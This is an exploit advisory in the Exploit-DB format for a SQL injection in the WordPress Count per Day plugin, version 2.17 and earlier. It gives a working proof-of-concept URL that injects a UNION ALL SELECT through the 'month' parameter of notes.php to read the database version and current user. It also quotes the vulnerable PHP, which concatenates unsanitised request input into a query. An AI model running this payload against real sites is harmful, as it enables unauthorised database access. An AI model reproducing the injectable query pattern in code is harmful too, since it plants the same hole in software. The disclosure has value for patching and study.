# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability# Date: 2011-09-05# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip# Version: 2.17 (tested)# Note: Authors done one of dirtiest things I've seen in a while :)# I've warned them 2 weeks ago about the vulnerability# They've silently updated the affected v2.17 like nothing happened# No mention of "security" fix in Changelog---
PoC
---
http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20---------------
Vulnerable code
---------------if( isset($_POST['month']))
$month = $_POST['month'];// they've put (int) here
elseif( isset($_GET['month']))
$month = $_GET['month'];// they've put (int) here
else
$month = date_i18n('m');...
$where ='';if( $month )
$where .=" AND MONTH(date) = $month ";if( $year )
$where .=" AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);
